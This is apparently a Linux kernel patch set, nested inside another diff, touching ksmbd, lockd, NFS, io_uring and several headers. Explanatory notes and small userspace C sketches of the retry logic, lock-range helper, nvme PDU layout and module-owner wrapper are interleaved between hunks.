+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -114,7 +114,8 @@ struct ksmbd_transport_ops {
+ 	int (*prepare)(struct ksmbd_transport *t);
+ 	void (*disconnect)(struct ksmbd_transport *t);
+ 	void (*shutdown)(struct ksmbd_transport *t);
+-	int (*read)(struct ksmbd_transport *t, char *buf, unsigned int size);
++	int (*read)(struct ksmbd_transport *t, char *buf,
++		    unsigned int size, int max_retries);
+ 	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
+ 		      int size, bool need_invalidate_rkey,
+ 		      unsigned int remote_key);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 0f0f1243a9cbf..daaee7a89e050 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -2994,8 +2994,11 @@ int smb2_open(struct ksmbd_work *work)
+ 							sizeof(struct smb_acl) +
+ 							sizeof(struct smb_ace) * ace_num * 2,
+ 							GFP_KERNEL);
+-					if (!pntsd)
++					if (!pntsd) {
++						posix_acl_release(fattr.cf_acls);
++						posix_acl_release(fattr.cf_dacls);
+ 						goto err_out;
++					}
+ 
+ 					rc = build_sec_desc(user_ns,
+ 							    pntsd, NULL, 0,
+@@ -4951,6 +4954,10 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 
+ 		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
+ 
++		if (test_share_config_flag(work->tcon->share_conf,
++		    KSMBD_SHARE_FLAG_STREAMS))
++			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
++
+ 		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
+ 		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
+ 					"NTFS", PATH_MAX, conn->local_nls, 0);
+@@ -7457,13 +7464,16 @@ static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
+ 	if (in_count == 0)
+ 		return -EINVAL;
+ 
++	start = le64_to_cpu(qar_req->file_offset);
++	length = le64_to_cpu(qar_req->length);
++
++	if (start < 0 || length < 0)
++		return -EINVAL;
++
+ 	fp = ksmbd_lookup_fd_fast(work, id);
+ 	if (!fp)
+ 		return -ENOENT;
+ 
+-	start = le64_to_cpu(qar_req->file_offset);
+-	length = le64_to_cpu(qar_req->length);
+-
+ 	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
+ 				   qar_rsp, in_count, out_count);
+ 	if (ret && ret != -E2BIG)
+@@ -7764,7 +7774,7 @@ int smb2_ioctl(struct ksmbd_work *work)
+ 
+ 		off = le64_to_cpu(zero_data->FileOffset);
+ 		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
+-		if (off > bfz) {
++		if (off < 0 || bfz < 0 || off > bfz) {
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index d96da872d70a1..3d9e8d8a5762b 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -434,7 +434,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+ 
+ static int __smb2_negotiate(struct ksmbd_conn *conn)
+ {
+-	return (conn->dialect >= SMB21_PROT_ID &&
++	return (conn->dialect >= SMB20_PROT_ID &&
+ 		conn->dialect <= SMB311_PROT_ID);
+ }
+ 
+@@ -442,9 +442,26 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ {
+ 	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
+ 
+-	ksmbd_debug(SMB, "Unsupported SMB protocol\n");
+-	neg_rsp->hdr.Status.CifsError = STATUS_INVALID_LOGON_TYPE;
+-	return -EINVAL;
++	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
++
++	/*
++	 * Remove 4 byte direct TCP header, add 2 byte bcc and
++	 * 2 byte DialectIndex.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++
++	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
++	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
++	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++
++	neg_rsp->hdr.WordCount = 1;
++	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
++	neg_rsp->ByteCount = 0;
++	return 0;
+ }
+ 
+ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+@@ -465,7 +482,7 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		}
+ 	}
+ 
+-	if (command == SMB2_NEGOTIATE_HE && __smb2_negotiate(conn)) {
++	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+ 		init_smb2_neg_rsp(work);
+ 		return ret;
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index 318c16fa81da3..c1f3006792ff6 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -158,8 +158,15 @@
+ 
+ #define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
+ #define SMB_COM_NEGOTIATE		0x72
+-
+ #define SMB1_CLIENT_GUID_SIZE		(16)
++
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
++#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
++#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
++
+ struct smb_hdr {
+ 	__be32 smb_buf_length;
+ 	__u8 Protocol[4];
+@@ -199,28 +206,7 @@ struct smb_negotiate_req {
+ struct smb_negotiate_rsp {
+ 	struct smb_hdr hdr;     /* wct = 17 */
+ 	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__u8 SecurityMode;
+-	__le16 MaxMpxCount;
+-	__le16 MaxNumberVcs;
+-	__le32 MaxBufferSize;
+-	__le32 MaxRawSize;
+-	__le32 SessionKey;
+-	__le32 Capabilities;    /* see below */
+-	__le32 SystemTimeLow;
+-	__le32 SystemTimeHigh;
+-	__le16 ServerTimeZone;
+-	__u8 EncryptionKeyLength;
+ 	__le16 ByteCount;
+-	union {
+-		unsigned char EncryptionKey[8]; /* cap extended security off */
+-		/* followed by Domain name - if extended security is off */
+-		/* followed by 16 bytes of server GUID */
+-		/* then security blob if cap_extended_security negotiated */
+-		struct {
+-			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
+-			unsigned char SecurityBlob[1];
+-		} __packed extended_response;
+-	} __packed u;
+ } __packed;
+ 
+ struct filesystem_attribute_info {
+diff --git a/fs/ksmbd/transport_rdma.c b/fs/ksmbd/transport_rdma.c
+index 096eda9ef873b..c06efc020bd95 100644
+--- a/fs/ksmbd/transport_rdma.c
++++ b/fs/ksmbd/transport_rdma.c
+@@ -670,7 +670,7 @@ static int smb_direct_post_recv(struct smb_direct_transport *t,
+ }
+ 
+ static int smb_direct_read(struct ksmbd_transport *t, char *buf,
+-			   unsigned int size)
++			   unsigned int size, int unused)
+ {
+ 	struct smb_direct_recvmsg *recvmsg;
+ 	struct smb_direct_data_transfer *data_transfer;
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 603893fd87f57..20e85e2701f26 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -291,16 +291,18 @@ static int ksmbd_tcp_run_kthread(struct interface *iface)
+ 
+ /**
+  * ksmbd_tcp_readv() - read data from socket in given iovec
+- * @t:		TCP transport instance
+- * @iov_orig:	base IO vector
+- * @nr_segs:	number of segments in base iov
+- * @to_read:	number of bytes to read from socket
++ * @t:			TCP transport instance
++ * @iov_orig:		base IO vector
++ * @nr_segs:		number of segments in base iov
++ * @to_read:		number of bytes to read from socket
++ * @max_retries:	maximum retry count
+  *
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+-			   unsigned int nr_segs, unsigned int to_read)
++			   unsigned int nr_segs, unsigned int to_read,
++			   int max_retries)
+ {
+ 	int length = 0;
+ 	int total_read;
+@@ -308,7 +310,6 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 	struct msghdr ksmbd_msg;
+ 	struct kvec *iov;
+ 	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
+-	int max_retry = 2;
+ 
+ 	iov = get_conn_iovec(t, nr_segs);
+ 	if (!iov)
+@@ -335,14 +336,23 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
+ 			total_read = -EAGAIN;
+ 			break;
+-		} else if ((length == -ERESTARTSYS || length == -EAGAIN) &&
+-			   max_retry) {
++		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++			/*
++			 * If max_retries is negative, allow unlimited
++			 * retries to keep the connection with inactive sessions.
++			 */
++			if (max_retries == 0) {
++				total_read = length;
++				break;
++			} else if (max_retries > 0) {
++				max_retries--;
++			}
++
+ 			usleep_range(1000, 2000);
+ 			length = 0;
+-			max_retry--;
+ 			continue;
+ 		} else if (length <= 0) {
+-			total_read = -EAGAIN;
++			total_read = length;
+ 			break;
+ 		}
+ 	}
+@@ -358,14 +368,15 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+-static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf, unsigned int to_read)
++static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
++			  unsigned int to_read, int max_retries)
+ {
+ 	struct kvec iov;
+ 
+ 	iov.iov_base = buf;
+ 	iov.iov_len = to_read;
+ 
+-	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read);
++	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
+ }
+ 
+ static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
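
The new max_retries argument gives ksmbd_tcp_readv() a three-way retry contract for -EAGAIN/-ERESTARTSYS: a negative value retries indefinitely (to keep connections with inactive sessions alive), zero fails immediately with the socket error, and a positive value bounds the retries around a 1-2 ms sleep. A standalone userspace sketch of just that contract; retry_read(), fake_read() and the ERESTARTSYS definition are stand-ins, not kernel code:

#include <errno.h>
#include <stdio.h>
#include <unistd.h>

#define ERESTARTSYS 512	/* kernel-internal, absent from userspace errno.h */

static int attempts;

/* placeholder for the real socket read: fail twice, then return 8 bytes */
static int fake_read(void)
{
	return ++attempts <= 2 ? -EAGAIN : 8;
}

static int retry_read(int (*read_fn)(void), int max_retries)
{
	for (;;) {
		int ret = read_fn();

		if (ret != -EAGAIN && ret != -ERESTARTSYS)
			return ret;		/* success or a hard error */
		if (max_retries == 0)
			return ret;		/* retries exhausted: report it */
		if (max_retries > 0)
			max_retries--;		/* negative: retry forever */
		usleep(1000);			/* kernel: usleep_range(1000, 2000) */
	}
}

int main(void)
{
	printf("read returned %d\n", retry_read(fake_read, 2));	/* 8 */
	return 0;
}
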
+diff --git a/fs/lockd/clnt4xdr.c b/fs/lockd/clnt4xdr.c
+index 7df6324ccb8ab..8161667c976f8 100644
+--- a/fs/lockd/clnt4xdr.c
++++ b/fs/lockd/clnt4xdr.c
+@@ -261,7 +261,6 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	u32 exclusive;
+ 	int error;
+ 	__be32 *p;
+-	s32 end;
+ 
+ 	memset(lock, 0, sizeof(*lock));
+ 	locks_init_lock(fl);
+@@ -285,13 +284,7 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	fl->fl_type  = exclusive != 0 ? F_WRLCK : F_RDLCK;
+ 	p = xdr_decode_hyper(p, &l_offset);
+ 	xdr_decode_hyper(p, &l_len);
+-	end = l_offset + l_len - 1;
+-
+-	fl->fl_start = (loff_t)l_offset;
+-	if (l_len == 0 || end < 0)
+-		fl->fl_end = OFFSET_MAX;
+-	else
+-		fl->fl_end = (loff_t)end;
++	nlm4svc_set_file_lock_range(fl, l_offset, l_len);
+ 	error = 0;
+ out:
+ 	return error;
+diff --git a/fs/lockd/xdr4.c b/fs/lockd/xdr4.c
+index 712fdfeb8ef06..5fcbf30cd2759 100644
+--- a/fs/lockd/xdr4.c
++++ b/fs/lockd/xdr4.c
+@@ -33,6 +33,17 @@ loff_t_to_s64(loff_t offset)
+ 	return res;
+ }
+ 
++void nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len)
++{
++	s64 end = off + len - 1;
++
++	fl->fl_start = off;
++	if (len == 0 || end < 0)
++		fl->fl_end = OFFSET_MAX;
++	else
++		fl->fl_end = end;
++}
++
+ /*
+  * NLM file handles are defined by specification to be a variable-length
+  * XDR opaque no longer than 1024 bytes. However, this implementation
+@@ -80,7 +91,7 @@ svcxdr_decode_lock(struct xdr_stream *xdr, struct nlm_lock *lock)
+ 	locks_init_lock(fl);
+ 	fl->fl_flags = FL_POSIX;
+ 	fl->fl_type  = F_RDLCK;
+-
++	nlm4svc_set_file_lock_range(fl, lock->lock_start, lock->lock_len);
+ 	return true;
+ }
+ 
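
The new nlm4svc_set_file_lock_range() centralizes the (offset, length) to [fl_start, fl_end] conversion that decode_nlm4_holder() open-coded above: a zero length, or an end offset that wraps negative in s64, both mean "lock to end of file". A minimal userspace check of that mapping; set_range() is an invented name and OFFSET_MAX is assumed to be LLONG_MAX, as in the kernel:

#include <limits.h>
#include <stdint.h>
#include <stdio.h>

#define OFFSET_MAX LLONG_MAX

static void set_range(uint64_t off, uint64_t len,
		      long long *start, long long *end)
{
	int64_t e = (int64_t)(off + len - 1);	/* may wrap negative */

	*start = (long long)off;
	*end = (len == 0 || e < 0) ? OFFSET_MAX : (long long)e;
}

int main(void)
{
	long long s, e;

	set_range(100, 50, &s, &e);
	printf("[%lld, %lld]\n", s, e);			/* [100, 149] */

	set_range(100, 0, &s, &e);			/* zero length: to EOF */
	printf("to-EOF? %d\n", e == OFFSET_MAX);	/* 1 */

	set_range((1ULL << 63) - 1, 100, &s, &e);	/* end wraps past s64 */
	printf("clamped? %d\n", e == OFFSET_MAX);	/* 1 */
	return 0;
}
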
+diff --git a/fs/nfs/read.c b/fs/nfs/read.c
+index 8ae2c8d1219d8..cd970ce62786b 100644
+--- a/fs/nfs/read.c
++++ b/fs/nfs/read.c
+@@ -15,6 +15,7 @@
+ #include <linux/stat.h>
+ #include <linux/mm.h>
+ #include <linux/slab.h>
++#include <linux/task_io_accounting_ops.h>
+ #include <linux/pagemap.h>
+ #include <linux/sunrpc/clnt.h>
+ #include <linux/nfs_fs.h>
+@@ -338,6 +339,7 @@ int nfs_read_folio(struct file *file, struct folio *folio)
+ 
+ 	trace_nfs_aop_readpage(inode, page);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGE);
++	task_io_account_read(folio_size(folio));
+ 
+ 	/*
+ 	 * Try to flush any pending writes to the file..
+@@ -400,6 +402,7 @@ void nfs_readahead(struct readahead_control *ractl)
+ 
+ 	trace_nfs_aop_readahead(inode, readahead_pos(ractl), nr_pages);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGES);
++	task_io_account_read(readahead_length(ractl));
+ 
+ 	ret = -ESTALE;
+ 	if (NFS_STALE(inode))
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 59f9a8cee012a..dc3ba13546dd6 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -874,8 +874,15 @@ nfsd_splice_actor(struct pipe_inode_info *pipe, struct pipe_buffer *buf,
+ 	struct page *last_page;
+ 
+ 	last_page = page + (offset + sd->len - 1) / PAGE_SIZE;
+-	for (page += offset / PAGE_SIZE; page <= last_page; page++)
++	for (page += offset / PAGE_SIZE; page <= last_page; page++) {
++		/*
++		 * Skip page replacement when extending the contents
++		 * of the current page.
++		 */
++		if (page == *(rqstp->rq_next_page - 1))
++			continue;
+ 		svc_rqst_replace_page(rqstp, page);
++	}
+ 	if (rqstp->rq_res.page_len == 0)	// first call
+ 		rqstp->rq_res.page_base = offset % PAGE_SIZE;
+ 	rqstp->rq_res.page_len += sd->len;
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index b4041d0566a9a..ef9f9a2511b72 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -71,7 +71,7 @@ static int nilfs_ioctl_wrap_copy(struct the_nilfs *nilfs,
+ 	if (argv->v_index > ~(__u64)0 - argv->v_nmembs)
+ 		return -EINVAL;
+ 
+-	buf = (void *)__get_free_pages(GFP_NOFS, 0);
++	buf = (void *)get_zeroed_page(GFP_NOFS);
+ 	if (unlikely(!buf))
+ 		return -ENOMEM;
+ 	maxmembs = PAGE_SIZE / argv->v_size;
+diff --git a/fs/super.c b/fs/super.c
+index 4f8a626a35cd9..7c140ee60c547 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -476,13 +476,22 @@ void generic_shutdown_super(struct super_block *sb)
+ 
+ 		cgroup_writeback_umount();
+ 
+-		/* evict all inodes with zero refcount */
++		/* Evict all inodes with zero refcount. */
+ 		evict_inodes(sb);
+-		/* only nonzero refcount inodes can have marks */
++
++		/*
++		 * Clean up and evict any inodes that still have references due
++		 * to fsnotify or the security policy.
++		 */
+ 		fsnotify_sb_delete(sb);
+-		fscrypt_destroy_keyring(sb);
+ 		security_sb_delete(sb);
+ 
++		/*
++		 * Now that all potentially-encrypted inodes have been evicted,
++		 * the fscrypt keyring can be destroyed.
++		 */
++		fscrypt_destroy_keyring(sb);
++
+ 		if (sb->s_dio_done_wq) {
+ 			destroy_workqueue(sb->s_dio_done_wq);
+ 			sb->s_dio_done_wq = NULL;
+diff --git a/fs/verity/verify.c b/fs/verity/verify.c
+index bde8c9b7d25f6..e23d382fc94b2 100644
+--- a/fs/verity/verify.c
++++ b/fs/verity/verify.c
+@@ -269,15 +269,15 @@ EXPORT_SYMBOL_GPL(fsverity_enqueue_verify_work);
+ int __init fsverity_init_workqueue(void)
+ {
+ 	/*
+-	 * Use an unbound workqueue to allow bios to be verified in parallel
+-	 * even when they happen to complete on the same CPU.  This sacrifices
+-	 * locality, but it's worthwhile since hashing is CPU-intensive.
++	 * Use a high-priority workqueue to prioritize verification work, which
++	 * blocks reads from completing, over regular application tasks.
+ 	 *
+-	 * Also use a high-priority workqueue to prioritize verification work,
+-	 * which blocks reads from completing, over regular application tasks.
++	 * For performance reasons, don't use an unbound workqueue.  Using an
++	 * unbound workqueue for crypto operations causes excessive scheduler
++	 * latency on ARM64.
+ 	 */
+ 	fsverity_read_workqueue = alloc_workqueue("fsverity_read_queue",
+-						  WQ_UNBOUND | WQ_HIGHPRI,
++						  WQ_HIGHPRI,
+ 						  num_online_cpus());
+ 	if (!fsverity_read_workqueue)
+ 		return -ENOMEM;
+diff --git a/include/linux/acpi_mdio.h b/include/linux/acpi_mdio.h
+index 0a24ab7cb66fa..8e2eefa9fbc0f 100644
+--- a/include/linux/acpi_mdio.h
++++ b/include/linux/acpi_mdio.h
+@@ -9,7 +9,14 @@
+ #include <linux/phy.h>
+ 
+ #if IS_ENABLED(CONFIG_ACPI_MDIO)
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode);
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner);
++
++static inline int
++acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *handle)
++{
++	return __acpi_mdiobus_register(mdio, handle, THIS_MODULE);
++}
+ #else /* CONFIG_ACPI_MDIO */
+ static inline int
+ acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index d4afa8508a806..3a7909ed54980 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -96,6 +96,7 @@ static inline void user_exit_irqoff(void) { }
+ static inline int exception_enter(void) { return 0; }
+ static inline void exception_exit(enum ctx_state prev_ctx) { }
+ static inline int ct_state(void) { return -1; }
++static inline int __ct_state(void) { return -1; }
+ static __always_inline bool context_tracking_guest_enter(void) { return false; }
+ static inline void context_tracking_guest_exit(void) { }
+ #define CT_WARN_ON(cond) do { } while (0)
+diff --git a/include/linux/context_tracking_state.h b/include/linux/context_tracking_state.h
+index 4a4d56f771802..fdd537ea513ff 100644
+--- a/include/linux/context_tracking_state.h
++++ b/include/linux/context_tracking_state.h
+@@ -46,7 +46,9 @@ struct context_tracking {
+ 
+ #ifdef CONFIG_CONTEXT_TRACKING
+ DECLARE_PER_CPU(struct context_tracking, context_tracking);
++#endif
+ 
++#ifdef CONFIG_CONTEXT_TRACKING_USER
+ static __always_inline int __ct_state(void)
+ {
+ 	return arch_atomic_read(this_cpu_ptr(&context_tracking.state)) & CT_STATE_MASK;
+diff --git a/include/linux/lockd/xdr4.h b/include/linux/lockd/xdr4.h
+index 9a6b55da8fd64..72831e35dca32 100644
+--- a/include/linux/lockd/xdr4.h
++++ b/include/linux/lockd/xdr4.h
+@@ -22,6 +22,7 @@
+ #define	nlm4_fbig		cpu_to_be32(NLM_FBIG)
+ #define	nlm4_failed		cpu_to_be32(NLM_FAILED)
+ 
++void	nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len);
+ bool	nlm4svc_decode_void(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_testargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_lockargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+diff --git a/include/linux/nvme-tcp.h b/include/linux/nvme-tcp.h
+index 75470159a194d..57ebe1267f7fb 100644
+--- a/include/linux/nvme-tcp.h
++++ b/include/linux/nvme-tcp.h
+@@ -115,8 +115,9 @@ struct nvme_tcp_icresp_pdu {
+ struct nvme_tcp_term_pdu {
+ 	struct nvme_tcp_hdr	hdr;
+ 	__le16			fes;
+-	__le32			fei;
+-	__u8			rsvd[8];
++	__le16			feil;
++	__le16			feiu;
++	__u8			rsvd[10];
+ };
+ 
+ /**
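
The term PDU change above splits the 32-bit Field Error Information into two 16-bit halves, presumably because a __le32 following the 2-byte fes field would be padded out to offset 12 while the spec places FEI at byte 10; two __le16 members keep the wire layout without __packed, and rsvd grows to 10 bytes so the PDU stays 24 bytes. A userspace sketch of the fixed layout and of reassembling FEI; the struct and helper names are invented, and le16toh()/htole16() from <endian.h> stand in for the kernel's byte-order helpers:

#include <assert.h>
#include <endian.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct term_pdu_fixed {
	uint8_t  hdr[8];	/* struct nvme_tcp_hdr is 8 bytes */
	uint16_t fes;		/* Fatal Error Status */
	uint16_t feil;		/* FEI, low 16 bits, little endian */
	uint16_t feiu;		/* FEI, high 16 bits, little endian */
	uint8_t  rsvd[10];
};

static uint32_t term_pdu_fei(const struct term_pdu_fixed *pdu)
{
	return le16toh(pdu->feil) | ((uint32_t)le16toh(pdu->feiu) << 16);
}

int main(void)
{
	struct term_pdu_fixed pdu = {
		.feil = htole16(0x5678),
		.feiu = htole16(0x1234),
	};

	/* FEI must sit at byte 10 and the whole PDU stay 24 bytes */
	assert(offsetof(struct term_pdu_fixed, feil) == 10);
	assert(sizeof(struct term_pdu_fixed) == 24);

	printf("fei = 0x%08x\n", (unsigned)term_pdu_fei(&pdu));	/* 0x12345678 */
	return 0;
}
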
+diff --git a/include/linux/of_mdio.h b/include/linux/of_mdio.h
+index da633d34ab866..8a52ef2e6fa6b 100644
+--- a/include/linux/of_mdio.h
++++ b/include/linux/of_mdio.h
+@@ -14,9 +14,25 @@
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ bool of_mdiobus_child_is_phy(struct device_node *child);
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np);
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np);
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner);
++
++static inline int of_mdiobus_register(struct mii_bus *mdio,
++				      struct device_node *np)
++{
++	return __of_mdiobus_register(mdio, np, THIS_MODULE);
++}
++
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner);
++
++static inline int devm_of_mdiobus_register(struct device *dev,
++					   struct mii_bus *mdio,
++					   struct device_node *np)
++{
++	return __devm_of_mdiobus_register(dev, mdio, np, THIS_MODULE);
++}
++
+ struct mdio_device *of_mdio_find_device(struct device_node *np);
+ struct phy_device *of_phy_find_device(struct device_node *phy_np);
+ struct phy_device *
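
The acpi_mdiobus_register() and of_mdiobus_register() changes here use the same idiom: the exported __-prefixed function gains a struct module *owner parameter, and a static inline wrapper in the header supplies THIS_MODULE, so the macro expands in the registering driver rather than in the MDIO glue code that would otherwise be recorded as the bus owner. A generic userspace sketch of the pattern; all names are invented, and a per-file tag stands in for struct module/THIS_MODULE:

#include <stdio.h>

/* stand-ins for struct module and THIS_MODULE: one tag per source file */
struct module { const char *name; };
static struct module this_module = { .name = __FILE__ };
#define THIS_MODULE (&this_module)

struct widget { struct module *owner; };

/* "exported" implementation: records who really owns the widget */
static int __widget_register(struct widget *w, struct module *owner)
{
	w->owner = owner;
	return 0;
}

/* header-style wrapper: THIS_MODULE expands at the caller's site */
static inline int widget_register(struct widget *w)
{
	return __widget_register(w, THIS_MODULE);
}

int main(void)
{
	struct widget w;

	widget_register(&w);
	printf("owner: %s\n", w.owner->name);
	return 0;
}
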
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index 313edd19bf545..d82ff9fa1a6e8 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -215,7 +215,7 @@ struct plat_stmmacenet_data {
+ 	int unicast_filter_entries;
+ 	int tx_fifo_size;
+ 	int rx_fifo_size;
+-	u32 addr64;
++	u32 host_dma_width;
+ 	u32 rx_queues_to_use;
+ 	u32 tx_queues_to_use;
+ 	u8 rx_sched_algorithm;
+diff --git a/include/linux/sysfb.h b/include/linux/sysfb.h
+index 8ba8b5be55675..c1ef5fc60a3cb 100644
+--- a/include/linux/sysfb.h
++++ b/include/linux/sysfb.h
+@@ -70,11 +70,16 @@ static inline void sysfb_disable(void)
+ #ifdef CONFIG_EFI
+ 
+ extern struct efifb_dmi_info efifb_dmi_list[];
+-void sysfb_apply_efi_quirks(struct platform_device *pd);
++void sysfb_apply_efi_quirks(void);
++void sysfb_set_efifb_fwnode(struct platform_device *pd);
+ 
+ #else /* CONFIG_EFI */
+ 
+-static inline void sysfb_apply_efi_quirks(struct platform_device *pd)
++static inline void sysfb_apply_efi_quirks(void)
++{
++}
++
++static inline void sysfb_set_efifb_fwnode(struct platform_device *pd)
+ {
+ }
+ 
+diff --git a/io_uring/filetable.c b/io_uring/filetable.c
+index 68dfc6936aa72..b80614e7d6051 100644
+--- a/io_uring/filetable.c
++++ b/io_uring/filetable.c
+@@ -19,6 +19,9 @@ static int io_file_bitmap_get(struct io_ring_ctx *ctx)
+ 	unsigned long nr = ctx->file_alloc_end;
+ 	int ret;
+ 
++	if (!table->bitmap)
++		return -ENFILE;
++
+ 	do {
+ 		ret = find_next_zero_bit(table->bitmap, nr, table->alloc_hint);
+ 		if (ret != nr)
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 4fdc2770bbe44..f6d8b02387a9d 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -47,6 +47,7 @@ struct io_connect {
+ 	struct sockaddr __user		*addr;
+ 	int				addr_len;
+ 	bool				in_progress;
++	bool				seen_econnaborted;
+ };
+ 
+ struct io_sr_msg {
+@@ -1404,7 +1405,7 @@ int io_connect_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 
+ 	conn->addr = u64_to_user_ptr(READ_ONCE(sqe->addr));
+ 	conn->addr_len =  READ_ONCE(sqe->addr2);
+-	conn->in_progress = false;
++	conn->in_progress = conn->seen_econnaborted = false;
+ 	return 0;
+ }
+ 
+@@ -1441,18 +1442,24 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	ret = __sys_connect_file(req->file, &io->address,
+ 					connect->addr_len, file_flags);
+-	if ((ret == -EAGAIN || ret == -EINPROGRESS) && force_nonblock) {
++	if ((ret == -EAGAIN || ret == -EINPROGRESS || ret == -ECONNABORTED)
++	    && force_nonblock) {
+ 		if (ret == -EINPROGRESS) {
+ 			connect->in_progress = true;
+-		} else {
+-			if (req_has_async_data(req))
+-				return -EAGAIN;
+-			if (io_alloc_async_data(req)) {
+-				ret = -ENOMEM;
++			return -EAGAIN;
++		}
++		if (ret == -ECONNABORTED) {
++			if (connect->seen_econnaborted)
+ 				goto out;
+-			}
+-			memcpy(req->async_data, &__io, sizeof(__io));
++			connect->seen_econnaborted = true;
++		}
++		if (req_has_async_data(req))
++			return -EAGAIN;
++		if (io_alloc_async_data(req)) {
++			ret = -ENOMEM;
++			goto out;
+ 		}
++		memcpy(req->async_data, &__io, sizeof(__io));
